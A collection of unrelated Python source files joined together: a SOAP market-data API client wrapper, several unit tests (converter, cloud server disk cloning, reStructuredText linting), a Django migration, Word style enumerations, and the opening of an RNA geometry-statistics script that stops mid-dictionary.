# Calling parser functions for each data type
if self.input_parser:
for name, (typ, value) in params.items():
try:
parser = getattr(utils, f'make_{typ}')
params[name][1] = parser(value, self.factory)
except AttributeError:
pass
return {k: v[1] for k, v in params.items()}
def _parse_response(self, resp, output_type):
"""
Uses util parser functions in order to return response in a
less verbose and more more user-friendly format.
Can be disabled/customized by editing `self.options`.
:param resp: Zeep response object
:param output_type: API function output signataure
:return: Parsed dictionary/DataFrameresponse
"""
output_type = output_type.split(': ')[-1]
if self.target_cls is None:
return resp
else:
resp = serialize_object(resp.body, target_cls=self.target_cls)
# Calling parser functions for data type
if self.output_parser:
try:
parser = getattr(utils, f'parse_{output_type}')
resp = parser(resp)
except AttributeError:
pass
return resp
# # Quota and permissions
get_look_back_period = pm(_wrap, function='GetLookBackPeriod')
get_quota = pm(_wrap, function='GetQuota')
get_ric_list = pm(_wrap, function='GetRICList')
get_used_instruments = pm(_wrap, function='GetUsedInstruments')
# Instrument details
expand_chain = pm(_wrap, function='ExpandChain')
get_ric_symbology = pm(_wrap, function='GetRICSymbology')
search_rics = pm(_wrap, function='SearchRICs')
verify_rics = pm(_wrap, function='VerifyRICs')
# Request instrument data directly
submit_request = pm(_wrap, function='SubmitRequest')
clean_up = pm(_wrap, function='CleanUp')
# Request instrument data using HTTP/FTP
set_ftp_details = pm(_wrap, function='SetFTPDetails')
test_ftp = pm(_wrap, function='TestFTP')
submit_ftp_request = pm(_wrap, function='SubmitFTPRequest')
# Retrieving requested data
get_status = pm(_wrap, function='GetInflightStatus')
cancel_request = pm(_wrap, function='CancelRequest')
get_request_result = pm(_wrap, function='GetRequestResult')
# Speed Guide
get_page = pm(_wrap, function='GetPage')
get_snapshot_info = pm(_wrap, function='GetSnapshotInfo')
search_page = pm(_wrap, function='SearchPage')
# Data dictionary
get_asset_domains = pm(_wrap, function='GetAssetDomains')
get_bond_types = pm(_wrap, function='GetBondTypes')
get_countries = pm(_wrap, function='GetCountries')
get_credit_ratings = pm(_wrap, function='GetCreditRatings')
get_currencies = pm(_wrap, function='GetCurrencies')
get_exchanges = pm(_wrap, function='GetExchanges')
get_option_expiry_months = pm(_wrap, function='GetOptionExpiryMonths')
get_futures_delivery_months = pm(_wrap, function='GetFuturesDeliveryMonths')
get_instrument_types = pm(_wrap, function='GetInstrumentTypes')
get_restricted_pes = pm(_wrap, function='GetRestrictedPEs')
get_message_types = pm(_wrap, function='GetMessageTypes')
get_version = pm(_wrap, function='GetVersion')
class DebugPlugin(Plugin):
def __init__(self, parent):
self.parent = parent
def egress(self, envelope, http_headers, operation, binding_options):
if self.parent.debug:
print(operation)
print(http_headers)
print(etree.tostring(envelope, pretty_print=True).decode('utf-8'))
return envelope, http_headers
def ingress(self, envelope, http_headers, operation):
if self.parent.debug:
print(operation)
print(http_headers)
print(etree.tostring(envelope, pretty_print=True).decode('utf-8'))
return envelope, http_headers
|
# standard libraries
import logging
import unittest
# local libraries
from nion.utils import Converter
class TestConverter(unittest.TestCase):
def setUp(self) -> None:
pass
def tearDown(self) -> None:
pass
def test_float_to_scaled_integer_with_negative_min(self) -> None:
converter = Converter.FloatToScaledIntegerConverter(1000, -100, 100)
self.assertAlmostEqual(converter.convert(0) or 0, 500)
self.assertAlmostEqual(converter.convert(-100) or 0, 0)
self.assertAlmostEqual(converter.convert(100) or 0, 1000)
self.assertAlmostEqual(converter.convert_back(converter.convert(0)) or 0.0, 0)
self.assertAlmostEqual(converter.convert_back(converter.convert(-100)) or 0.0, -100)
self.assertAlmostEqual(converter.convert_back(converter.convert(100)) or 0.0, 100)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
|
import secrets
from ..common import cloudcli_server_request, assert_only_one_server, assert_no_matching_servers, wait_command
def test_server_hdlib_only_one_server(session_server_powered_on, session_server_powered_off):
assert_only_one_server([session_server_powered_on, session_server_powered_off], "/server/hdlib")
def test_server_hdlib_no_matching_servers():
assert_no_matching_servers("/server/hdlib")
def test_server_hdlib(temp_server):
# list the hard disks available for cloning on the temp server
res = cloudcli_server_request("/server/hdlib", method="POST", json={
"name": temp_server["name"]
})
assert len(res) == 1
# get the first hard disk uuid
hduuid = res[0]['uuid']
assert len(hduuid) > 10
# power off the server
res = cloudcli_server_request("/service/server/poweroff", method="POST", json={
"name": temp_server["name"]
})
assert len(res) == 1
wait_command(res[0])
# create the snapshot
res = cloudcli_server_request("/server/hdlib", method="POST", json={
"name": temp_server["name"],
"clone": hduuid,
"image-name": "clone_of_{}".format(temp_server["name"])
})
wait_command(res)
|
"""from django.shortcuts import render_to_response
class GeogebraAppletForm(forms.ModelForm):
"Форма для загрузки архива""
class Meta:
model = GeogebraApplet
fields = ['archive']
def main_page(request):
# если в POST есть данные, значит это post-запрос и мы пытаемся загрузить архив
if request.POST:
# инициализируем форму с переданными данными
form = GeogebraAppletForm(request.POST, request.FILES)
# если в форме нет ошибок, сохраняем
if form.is_valid():
form.save()
else:
# get запрос, просто инициализируем форму, чтобы вывести на странице
form = GeogebraAppletForm()
# получаем все чертежи
applet_list = GeogebraApplet.objects.all()
# форму и список чертежей добавляем контекст, чтобы отрисовать в шаблоне
context = {
form: form, applet_list: applet_list
}
return render_to_response('index.html', context) """ |
"""Top-level package for Regression Enrichment Surface."""
__author__ = """Austin Clyde"""
__email__ = 'aclyde@uchicago.edu'
__version__ = '0.1.0'
|
# Load in our dependencies
from __future__ import absolute_import
import os
import subprocess
import sys
import textwrap
from unittest import TestCase
import restructuredtext_lint
_dir = os.path.dirname(os.path.abspath(__file__))
valid_rst = os.path.join(_dir, 'test_files', 'valid.rst')
warning_rst = os.path.join(_dir, 'test_files', 'second_short_heading.rst')
dir_rst = os.path.join(_dir, 'test_files', 'dir')
invalid_rst = os.path.join(_dir, 'test_files', 'invalid.rst')
rst_lint_path = os.path.join(_dir, os.pardir, 'cli.py')
"""
# TODO: Implement this as a class (options) with a sugar function that lints a string against a set of options
An invalid rst file
when linted with the `fail_first` parameter
raises on the first error
"""
class TestRestructuredtextLint(TestCase):
def _load_file(self, filepath):
"""Load a file into memory"""
f = open(filepath)
file = f.read()
f.close()
return file
def _lint_file(self, *args, **kwargs):
"""Lint the file and preserve any errors"""
return restructuredtext_lint.lint(*args, **kwargs)
def test_passes_valid_rst(self):
"""A valid reStructuredText file will not raise any errors"""
content = self._load_file(valid_rst)
errors = self._lint_file(content)
self.assertEqual(errors, [])
def test_raises_on_invalid_rst(self):
"""An invalid reStructuredText file when linted raises errors"""
# Load and lint invalid file
content = self._load_file(invalid_rst)
actual_errors = self._lint_file(content, invalid_rst)
# Assert errors against expected errors
self.assertEqual(len(actual_errors), 1)
self.assertEqual(actual_errors[0].line, 2)
self.assertEqual(actual_errors[0].level, 2)
self.assertEqual(actual_errors[0].type, 'WARNING')
self.assertEqual(actual_errors[0].source, invalid_rst)
self.assertEqual(actual_errors[0].message, 'Title underline too short.')
def test_encoding_utf8(self):
"""A document with utf-8 characters is valid."""
filepath = os.path.join(_dir, 'test_files', 'utf8.rst')
errors = restructuredtext_lint.lint_file(filepath, encoding='utf-8')
self.assertEqual(errors, [])
def test_second_heading_short_line_number(self):
"""A document with a short second heading raises errors that include a line number
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/5
"""
filepath = os.path.join(_dir, 'test_files', 'second_short_heading.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertEqual(errors[0].line, 6)
self.assertEqual(errors[0].source, filepath)
def test_invalid_target(self):
"""A document with an invalid target name raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/6
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_target.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Unknown target name', errors[0].message)
def test_invalid_line_mismatch(self):
"""A document with an overline/underline mismatch raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/7
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_line_mismatch.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Title overline & underline mismatch', errors[0].message)
def test_invalid_link(self):
"""A document with a bad link raises an error
This is a regression test for https://github.com/twolfson/restructuredtext-lint/issues/12
"""
filepath = os.path.join(_dir, 'test_files', 'invalid_link.rst')
errors = restructuredtext_lint.lint_file(filepath)
self.assertIn('Anonymous hyperlink mismatch: 1 references but 0 targets.', errors[0].message)
self.assertIn('Hyperlink target "hello" is not referenced.', errors[1].message)
def test_rst_prolog_basic(self):
"""A document using substitutions from an `rst-prolog` has no errors"""
# https://github.com/twolfson/restructuredtext-lint/issues/39
# Set up our common content
rst_prolog = textwrap.dedent("""
.. |World| replace:: Moon
""")
content = textwrap.dedent("""
Hello
=====
|World|
""")
# Verify we have errors about substitutions without our `--rst-prolog`
errors = restructuredtext_lint.lint(content)
self.assertEqual(len(errors), 1)
self.assertIn('Undefined substitution referenced: "World"', errors[0].message)
# Verify we have no errors with our `--rst-prolog`
errors = restructuredtext_lint.lint(content, rst_prolog=rst_prolog)
self.assertEqual(len(errors), 0)
def test_rst_prolog_line_offset(self):
"""A document with errors using an `rst-prolog` offsets our error lines"""
# https://github.com/twolfson/restructuredtext-lint/issues/39
# Perform our setup
rst_prolog = textwrap.dedent("""
.. |World| replace:: Moon
""")
content = textwrap.dedent("""
Hello
==
|World|
""")
# Lint our content and assert its errors
errors = restructuredtext_lint.lint(content, rst_prolog=rst_prolog)
self.assertEqual(len(errors), 1)
self.assertIn('Possible title underline, too short for the title', errors[0].message)
# DEV: Without adjustments, this would be 6 due to empty lines in multiline strings
self.assertEqual(errors[0].line, 3)
class TestRestructuredtextLintCLI(TestCase):
""" Tests for 'rst-lint' CLI command """
def test_rst_lint_filepaths_not_given(self):
"""The `rst-lint` command is available and prints error if no filepath was given."""
with self.assertRaises(subprocess.CalledProcessError) as e:
# python ../cli.py
subprocess.check_output((sys.executable, rst_lint_path), stderr=subprocess.STDOUT)
output = str(e.exception.output)
# Python 2: "too few arguments"
# Python 3: "the following arguments are required: filepath"
self.assertIn('arguments', output)
def test_rst_lint_correct_file(self):
"""The `rst-lint` command prints nothing if rst file is correct."""
# python ../cli.py test_files/valid.rst
raw_output = subprocess.check_output((sys.executable, rst_lint_path, valid_rst), universal_newlines=True)
output = str(raw_output)
self.assertEqual(output, '')
def test_rst_lint_folder(self):
"""The `rst-lint` command should print errors for files inside folders."""
with self.assertRaises(subprocess.CalledProcessError) as e:
subprocess.check_output((sys.executable, rst_lint_path, dir_rst), universal_newlines=True)
output = str(e.exception.output)
# Verify exactly 1 error is produced
self.assertEqual(output.count('WARNING'), 1)
def test_rst_lint_many_files(self):
"""The `rst-lint` command accepts many rst file paths and prints respective information for each of them."""
with self.assertRaises(subprocess.CalledProcessError) as e:
# python ../cli.py test_files/valid.rst invalid.rst
subprocess.check_output((sys.executable, rst_lint_path, valid_rst, invalid_rst), universal_newlines=True)
output = str(e.exception.output)
# 'rst-lint' should exit with error code 2 as linting failed:
self.assertEqual(e.exception.returncode, 2)
# There should be no clean output:
# DEV: This verifies only 1 line of output which is our invalid line
self.assertEqual(output.count('\n'), 1, output)
# There should be a least one invalid rst file:
self.assertIn('WARNING', output)
def test_level_fail(self):
"""Confirm low --level threshold fails file with warnings only"""
# This is the expected behaviour we are checking:
# $ rst-lint --level warning second_short_heading.rst ; echo "Return code $?"
# WARNING second_short_heading.rst:6 Title underline too short.
# WARNING second_short_heading.rst:6 Title underline too short.
# Return code 2
with self.assertRaises(subprocess.CalledProcessError) as e:
subprocess.check_output((sys.executable, rst_lint_path, '--level', 'warning', warning_rst),
universal_newlines=True)
output = str(e.exception.output)
self.assertEqual(output.count('\n'), 2, output)
self.assertEqual(output.count('WARNING'), 2, output)
# The expected 2 warnings should be treated as failing
self.assertEqual(e.exception.returncode, 2)
def test_level_high(self):
"""Confirm high --level threshold accepts file with warnings only"""
# This is the expected behaviour we are checking:
# $ rst-lint --level error second_short_heading.rst ; echo "Return code $?"
# Return code 0
raw_output = subprocess.check_output((sys.executable, rst_lint_path, '--level', 'error', warning_rst),
universal_newlines=True)
# `check_output` doesn't raise an exception code so it's error code 0
output = str(raw_output)
self.assertEqual(output, '')
|
# Generated by Django 3.1.7 on 2021-07-28 11:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('simple', '0004_auto_20210726_1217'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='slug',
),
]
|
# encoding: utf-8
"""
Enumerations related to styles
"""
from __future__ import absolute_import, print_function, unicode_literals
from docxx.enum.base import alias, EnumMember, XmlEnumeration, XmlMappedEnumMember
@alias('WD_STYLE')
class WD_BUILTIN_STYLE(XmlEnumeration):
"""
alias: **WD_STYLE**
Specifies a built-in Microsoft Word style.
Example::
from docxx import Document
from docxx.enum.style import WD_STYLE
document = Document()
styles = document.styles
style = styles[WD_STYLE.BODY_TEXT]
"""
__ms_name__ = 'WdBuiltinStyle'
__url__ = 'http://msdn.microsoft.com/en-us/library/office/ff835210.aspx'
__members__ = (
EnumMember(
'BLOCK_QUOTATION', -85, 'Block Text.'
),
EnumMember(
'BODY_TEXT', -67, 'Body Text.'
),
EnumMember(
'BODY_TEXT_2', -81, 'Body Text 2.'
),
EnumMember(
'BODY_TEXT_3', -82, 'Body Text 3.'
),
EnumMember(
'BODY_TEXT_FIRST_INDENT', -78, 'Body Text First Indent.'
),
EnumMember(
'BODY_TEXT_FIRST_INDENT_2', -79, 'Body Text First Indent 2.'
),
EnumMember(
'BODY_TEXT_INDENT', -68, 'Body Text Indent.'
),
EnumMember(
'BODY_TEXT_INDENT_2', -83, 'Body Text Indent 2.'
),
EnumMember(
'BODY_TEXT_INDENT_3', -84, 'Body Text Indent 3.'
),
EnumMember(
'BOOK_TITLE', -265, 'Book Title.'
),
EnumMember(
'CAPTION', -35, 'Caption.'
),
EnumMember(
'CLOSING', -64, 'Closing.'
),
EnumMember(
'COMMENT_REFERENCE', -40, 'Comment Reference.'
),
EnumMember(
'COMMENT_TEXT', -31, 'Comment Text.'
),
EnumMember(
'DATE', -77, 'Date.'
),
EnumMember(
'DEFAULT_PARAGRAPH_FONT', -66, 'Default Paragraph Font.'
),
EnumMember(
'EMPHASIS', -89, 'Emphasis.'
),
EnumMember(
'ENDNOTE_REFERENCE', -43, 'Endnote Reference.'
),
EnumMember(
'ENDNOTE_TEXT', -44, 'Endnote Text.'
),
EnumMember(
'ENVELOPE_ADDRESS', -37, 'Envelope Address.'
),
EnumMember(
'ENVELOPE_RETURN', -38, 'Envelope Return.'
),
EnumMember(
'FOOTER', -33, 'Footer.'
),
EnumMember(
'FOOTNOTE_REFERENCE', -39, 'Footnote Reference.'
),
EnumMember(
'FOOTNOTE_TEXT', -30, 'Footnote Text.'
),
EnumMember(
'HEADER', -32, 'Header.'
),
EnumMember(
'HEADING_1', -2, 'Heading 1.'
),
EnumMember(
'HEADING_2', -3, 'Heading 2.'
),
EnumMember(
'HEADING_3', -4, 'Heading 3.'
),
EnumMember(
'HEADING_4', -5, 'Heading 4.'
),
EnumMember(
'HEADING_5', -6, 'Heading 5.'
),
EnumMember(
'HEADING_6', -7, 'Heading 6.'
),
EnumMember(
'HEADING_7', -8, 'Heading 7.'
),
EnumMember(
'HEADING_8', -9, 'Heading 8.'
),
EnumMember(
'HEADING_9', -10, 'Heading 9.'
),
EnumMember(
'HTML_ACRONYM', -96, 'HTML Acronym.'
),
EnumMember(
'HTML_ADDRESS', -97, 'HTML Address.'
),
EnumMember(
'HTML_CITE', -98, 'HTML Cite.'
),
EnumMember(
'HTML_CODE', -99, 'HTML Code.'
),
EnumMember(
'HTML_DFN', -100, 'HTML Definition.'
),
EnumMember(
'HTML_KBD', -101, 'HTML Keyboard.'
),
EnumMember(
'HTML_NORMAL', -95, 'Normal (Web).'
),
EnumMember(
'HTML_PRE', -102, 'HTML Preformatted.'
),
EnumMember(
'HTML_SAMP', -103, 'HTML Sample.'
),
EnumMember(
'HTML_TT', -104, 'HTML Typewriter.'
),
EnumMember(
'HTML_VAR', -105, 'HTML Variable.'
),
EnumMember(
'HYPERLINK', -86, 'Hyperlink.'
),
EnumMember(
'HYPERLINK_FOLLOWED', -87, 'Followed Hyperlink.'
),
EnumMember(
'INDEX_1', -11, 'Index 1.'
),
EnumMember(
'INDEX_2', -12, 'Index 2.'
),
EnumMember(
'INDEX_3', -13, 'Index 3.'
),
EnumMember(
'INDEX_4', -14, 'Index 4.'
),
EnumMember(
'INDEX_5', -15, 'Index 5.'
),
EnumMember(
'INDEX_6', -16, 'Index 6.'
),
EnumMember(
'INDEX_7', -17, 'Index 7.'
),
EnumMember(
'INDEX_8', -18, 'Index 8.'
),
EnumMember(
'INDEX_9', -19, 'Index 9.'
),
EnumMember(
'INDEX_HEADING', -34, 'Index Heading'
),
EnumMember(
'INTENSE_EMPHASIS', -262, 'Intense Emphasis.'
),
EnumMember(
'INTENSE_QUOTE', -182, 'Intense Quote.'
),
EnumMember(
'INTENSE_REFERENCE', -264, 'Intense Reference.'
),
EnumMember(
'LINE_NUMBER', -41, 'Line Number.'
),
EnumMember(
'LIST', -48, 'List.'
),
EnumMember(
'LIST_2', -51, 'List 2.'
),
EnumMember(
'LIST_3', -52, 'List 3.'
),
EnumMember(
'LIST_4', -53, 'List 4.'
),
EnumMember(
'LIST_5', -54, 'List 5.'
),
EnumMember(
'LIST_BULLET', -49, 'List Bullet.'
),
EnumMember(
'LIST_BULLET_2', -55, 'List Bullet 2.'
),
EnumMember(
'LIST_BULLET_3', -56, 'List Bullet 3.'
),
EnumMember(
'LIST_BULLET_4', -57, 'List Bullet 4.'
),
EnumMember(
'LIST_BULLET_5', -58, 'List Bullet 5.'
),
EnumMember(
'LIST_CONTINUE', -69, 'List Continue.'
),
EnumMember(
'LIST_CONTINUE_2', -70, 'List Continue 2.'
),
EnumMember(
'LIST_CONTINUE_3', -71, 'List Continue 3.'
),
EnumMember(
'LIST_CONTINUE_4', -72, 'List Continue 4.'
),
EnumMember(
'LIST_CONTINUE_5', -73, 'List Continue 5.'
),
EnumMember(
'LIST_NUMBER', -50, 'List Number.'
),
EnumMember(
'LIST_NUMBER_2', -59, 'List Number 2.'
),
EnumMember(
'LIST_NUMBER_3', -60, 'List Number 3.'
),
EnumMember(
'LIST_NUMBER_4', -61, 'List Number 4.'
),
EnumMember(
'LIST_NUMBER_5', -62, 'List Number 5.'
),
EnumMember(
'LIST_PARAGRAPH', -180, 'List Paragraph.'
),
EnumMember(
'MACRO_TEXT', -46, 'Macro Text.'
),
EnumMember(
'MESSAGE_HEADER', -74, 'Message Header.'
),
EnumMember(
'NAV_PANE', -90, 'Document Map.'
),
EnumMember(
'NORMAL', -1, 'Normal.'
),
EnumMember(
'NORMAL_INDENT', -29, 'Normal Indent.'
),
EnumMember(
'NORMAL_OBJECT', -158, 'Normal (applied to an object).'
),
EnumMember(
'NORMAL_TABLE', -106, 'Normal (applied within a table).'
),
EnumMember(
'NOTE_HEADING', -80, 'Note Heading.'
),
EnumMember(
'PAGE_NUMBER', -42, 'Page Number.'
),
EnumMember(
'PLAIN_TEXT', -91, 'Plain Text.'
),
EnumMember(
'QUOTE', -181, 'Quote.'
),
EnumMember(
'SALUTATION', -76, 'Salutation.'
),
EnumMember(
'SIGNATURE', -65, 'Signature.'
),
EnumMember(
'STRONG', -88, 'Strong.'
),
EnumMember(
'SUBTITLE', -75, 'Subtitle.'
),
EnumMember(
'SUBTLE_EMPHASIS', -261, 'Subtle Emphasis.'
),
EnumMember(
'SUBTLE_REFERENCE', -263, 'Subtle Reference.'
),
EnumMember(
'TABLE_COLORFUL_GRID', -172, 'Colorful Grid.'
),
EnumMember(
'TABLE_COLORFUL_LIST', -171, 'Colorful List.'
),
EnumMember(
'TABLE_COLORFUL_SHADING', -170, 'Colorful Shading.'
),
EnumMember(
'TABLE_DARK_LIST', -169, 'Dark List.'
),
EnumMember(
'TABLE_LIGHT_GRID', -161, 'Light Grid.'
),
EnumMember(
'TABLE_LIGHT_GRID_ACCENT_1', -175, 'Light Grid Accent 1.'
),
EnumMember(
'TABLE_LIGHT_LIST', -160, 'Light List.'
),
EnumMember(
'TABLE_LIGHT_LIST_ACCENT_1', -174, 'Light List Accent 1.'
),
EnumMember(
'TABLE_LIGHT_SHADING', -159, 'Light Shading.'
),
EnumMember(
'TABLE_LIGHT_SHADING_ACCENT_1', -173, 'Light Shading Accent 1.'
),
EnumMember(
'TABLE_MEDIUM_GRID_1', -166, 'Medium Grid 1.'
),
EnumMember(
'TABLE_MEDIUM_GRID_2', -167, 'Medium Grid 2.'
),
EnumMember(
'TABLE_MEDIUM_GRID_3', -168, 'Medium Grid 3.'
),
EnumMember(
'TABLE_MEDIUM_LIST_1', -164, 'Medium List 1.'
),
EnumMember(
'TABLE_MEDIUM_LIST_1_ACCENT_1', -178, 'Medium List 1 Accent 1.'
),
EnumMember(
'TABLE_MEDIUM_LIST_2', -165, 'Medium List 2.'
),
EnumMember(
'TABLE_MEDIUM_SHADING_1', -162, 'Medium Shading 1.'
),
EnumMember(
'TABLE_MEDIUM_SHADING_1_ACCENT_1', -176,
'Medium Shading 1 Accent 1.'
),
EnumMember(
'TABLE_MEDIUM_SHADING_2', -163, 'Medium Shading 2.'
),
EnumMember(
'TABLE_MEDIUM_SHADING_2_ACCENT_1', -177,
'Medium Shading 2 Accent 1.'
),
EnumMember(
'TABLE_OF_AUTHORITIES', -45, 'Table of Authorities.'
),
EnumMember(
'TABLE_OF_FIGURES', -36, 'Table of Figures.'
),
EnumMember(
'TITLE', -63, 'Title.'
),
EnumMember(
'TOAHEADING', -47, 'TOA Heading.'
),
EnumMember(
'TOC_1', -20, 'TOC 1.'
),
EnumMember(
'TOC_2', -21, 'TOC 2.'
),
EnumMember(
'TOC_3', -22, 'TOC 3.'
),
EnumMember(
'TOC_4', -23, 'TOC 4.'
),
EnumMember(
'TOC_5', -24, 'TOC 5.'
),
EnumMember(
'TOC_6', -25, 'TOC 6.'
),
EnumMember(
'TOC_7', -26, 'TOC 7.'
),
EnumMember(
'TOC_8', -27, 'TOC 8.'
),
EnumMember(
'TOC_9', -28, 'TOC 9.'
),
)
class WD_STYLE_TYPE(XmlEnumeration):
"""
Specifies one of the four style types: paragraph, character, list, or
table.
Example::
from docx import Document
from docxx.enum.style import WD_STYLE_TYPE
styles = Document().styles
assert styles[0].type == WD_STYLE_TYPE.PARAGRAPH
"""
__ms_name__ = 'WdStyleType'
__url__ = 'http://msdn.microsoft.com/en-us/library/office/ff196870.aspx'
__members__ = (
XmlMappedEnumMember(
'CHARACTER', 2, 'character', 'Character style.'
),
XmlMappedEnumMember(
'LIST', 4, 'numbering', 'List style.'
),
XmlMappedEnumMember(
'PARAGRAPH', 1, 'paragraph', 'Paragraph style.'
),
XmlMappedEnumMember(
'TABLE', 3, 'table', 'Table style.'
),
)
|
#!/usr/bin/python3
# RNANet statistics
# Developed by Aglaé Tabot & Louis Becquey, 2021
# This file computes additional geometric measures over the produced dataset,
# and estimates their distribtuions through Gaussian mixture models.
# THIS FILE IS NOT SUPPOSED TO BE RUN DIRECTLY.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.stats as st
import Bio, glob, json, os, random, sqlite3, warnings
from Bio.PDB.MMCIFParser import MMCIFParser
from Bio.PDB.vectors import Vector, calc_angle, calc_dihedral
from multiprocessing import Pool, Value
from pandas.core.common import SettingWithCopyWarning
from setproctitle import setproctitle
from sklearn.mixture import GaussianMixture
from tqdm import tqdm
from RNAnet import init_with_tqdm, trace_unhandled_exceptions, warn, notify
runDir = os.getcwd()
# This dic stores the number laws to use in the GMM to estimate each parameter's distribution.
# If you do not want to trust this data, you can use the --rescan-nmodes option.
# GMMs will be trained between 1 and 8 modes and the best model will be kept.
modes_data = {
# bonded distances, all-atom, common to all. Some are also used for HiRE-RNA.
"C1'-C2'":3, "C2'-C3'":2, "C2'-O2'":2, "C3'-O3'":2, "C4'-C3'":2, "C4'-O4'":2, "C5'-C4'":2, "O3'-P":3, "O4'-C1'":3, "O5'-C5'":3, "P-O5'":3, "P-OP1":2, "P-OP2":2,
# bonded distances, all-atom, purines
"C4-C5":3, "C4-N9":2, "N3-C4":2, "C2-N3":2, "C2-N2":5, "N1-C2":3, "C6-N1":3, "C6-N6":3, "C6-O6":3, "C5-C6":2, "N7-C5":3, "C8-N7":2, "N9-C8":4, "C1'-N9":2,
# bonded distances, all-atom, pyrimidines
"C4-O4":2, "C4-N4":2, "C2-N1":1, "C2-O2":3, "N3-C2":4, "C4-N3":4, "C5-C4":2, "C6-C5":3, "N1-C6":2, "C1'-N1":2,
# torsions, all atom
"Alpha":3, "Beta":2, "Delta":2, "Epsilon":2, "Gamma":3, "Xhi":3, "Zeta":3,
# Pyle, distances
"C1'-P":3, "C4'-P":3, "P-C1'":3, "P-C4'":3,
# Pyle, angles
"C1'-P°-C1'°":3, "P-C1'-P°":2,
# Pyle, torsions
"Eta":1, "Theta":1, "Eta'":1, "Theta'":1, "Eta''":4, "Theta''":3,
# HiRE-RNA, distances
"C4'-P":3, "C4'-C1'":3, "C1'-B1":3, "B1-B2":2,
# HiRE-RNA, angles
"P-O5'-C5'":2, "O5'-C5'-C4'":1, "C5'-C4'-P":2, "C5'-C4'-C1'":2, "C4'-P-O5'":2, "C4'-C1'-B1":2, "C1'-C4'-P":2, "C1'-B1-B2":2,
# HiRE-RNA, torsions
"P-O5'-C5'-C4'":3, "O5'-C5'-C4'-P°":3, "O5'-C5'-C4'-C1'":3, "C5'-C4'-P°-O5'°":3, "C5'-C4'-C1'-B1":2, "C4'-P°-O5'°-C5'°":3, "C4'-C1'-B1-B2":3, "C1'-C4'-P°-O5'°":3,
# HiRE-RNA, basepairs
"cWW_AA_tips_distance":3, "cWW_AA_C1'-B1-B1pair":1, "cWW_AA_B1-B1pair-C1'pair":1, "cWW_AA_C4'-C1'-B1-B1pair":2, "cWW_AA_B1-B1pair-C1'pair-C4'pair":3, "cWW_AA_alpha_1":2, "cWW_AA_alpha_2":3, "cWW_AA_dB1":3, "cWW_AA_dB2":3,
"tWW_AA_tips_distance":1, "tWW_AA_C1'-B1-B1pair":1, "tWW_AA_B1-B1pair-C1'pair":1, "tWW_AA_C4'-C1'-B1-B1pair":2, "tWW_AA_B1-B1pair-C1'pair-C4'pair":3, "tWW_AA_alpha_1":2, "tWW_AA_alpha_2":1, "tWW_AA_dB1":1, "tWW_AA_dB2":2,
"cWH_AA_tips_distance":3, "cWH_AA_C1'-B1-B1pair":2, "cWH_AA_B1-B1pair-C1'pair":2, "cWH_AA_C4'-C1'-B1-B1pair":2, "cWH_AA_B1-B1pair-C1'pair-C4'pair":2, "cWH_AA_alpha_1":1, "cWH_AA_alpha_2":2, "cWH_AA_dB1":3, "cWH_AA_dB2":2,
"tWH_AA_tips_distance":3, "tWH_AA_C1'-B1-B1pair":1, "tWH_AA_B1-B1pair-C1'pair":3, "tWH_AA_C4'-C1'-B1-B1pair":2, "tWH_AA_B1-B1pair-C1'pair-C4'pair":2, "tWH_AA_alpha_1":1, "tWH_AA_alpha_2":3, "tWH_AA_dB1":2, "tWH_AA_dB2":1,
"cHW_AA_tips_distance":1, "cHW_AA_C1'-B1-B1pair":2, "cHW_AA_B1-B1pair-C1'pair":2, "cHW_AA_C4'-C1'-B1-B1pair":3, "cHW_AA_B1-B1pair-C1'pair-C4'pair":2, "cHW_AA_alpha_1":2, "cHW_AA_alpha_2":2, "cHW_AA_dB1":3, "cHW_AA_dB2":2,
"tHW_AA_tips_distance":4, "tHW_AA_C1'-B1-B1pair":2, "tHW_AA_B1-B1pair-C1'pair":2, "tHW_AA_C4'-C1'-B1-B1pair":2, "tHW_AA_B1-B1pair-C1'pair-C4'pair":2, "tHW_AA_alpha_1":2, "tHW_AA_alpha_2":1, "tHW_AA_dB1":2, "tHW_AA_dB2":1,
"cWS_AA_tips_distance":2, "cWS_AA_C1'-B1-B1pair":2, "cWS_AA_B1-B1pair-C1'pair":2, "cWS_AA_C4'-C1'-B1-B1pair":2, "cWS_AA_B1-B1pair-C1'pair-C4'pair":1, "cWS_AA_alpha_1":2, "cWS_AA_alpha_2":2, "cWS_AA_dB1":2, "cWS_AA_dB2":1,
"tWS_AA_tips_distance":2, "tWS_AA_C1'-B1-B1pair":2, "tWS_AA_B1-B1pair-C1'pair":2, "tWS_AA_C4'-C1'-B1-B1pair":3, "tWS_AA_B1-B1pair-C1'pair-C4'pair":1, "tWS_AA_alpha_1":2, "tWS_AA_alpha_2":2, "tWS_AA_dB1":2, "tWS_AA_dB2":3,
"cSW_AA_tips_distance":3, "cSW_AA_C1'-B1-B1pair":3, "cSW_AA_B1-B1pair-C1'pair":2, "cSW_AA_C4'-C1'-B1-B1pair":1, "cSW_AA_B1-B1pair-C1'pair-C4'pair":2, "cSW_AA_alpha_1":2, "cSW_AA_alpha_2":2, "cSW_AA_dB1":1, "cSW_AA_dB2":1,
"tSW_AA_tips_distance":3, "tSW_AA_C1'-B1-B1pair":3, "tSW_AA_B1-B1pair-C1'pair":3, "tSW_AA_C4'-C1'-B1-B1pair":2, "tSW_AA_B1-B1pair-C1'pair-C4'pair":2, "tSW_AA_alpha_1":2, "tSW_AA_alpha_2":2, "tSW_AA_dB1":2, "tSW_AA_dB2":2,
"cHH_AA_tips_distance":4, "cHH_AA_C1'-B1-B1pair":2, "cHH_AA_B1-B1pair-C1'pair":3, "cHH_AA_C4'-C1'-B1-B1pair":3, "cHH_AA_B1-B1pair-C1'pair-C4'pair":3, "cHH_AA_alpha_1":2, "cHH_AA_alpha_2":3, "cHH_AA_dB1":3, "cHH_AA_dB2":1,
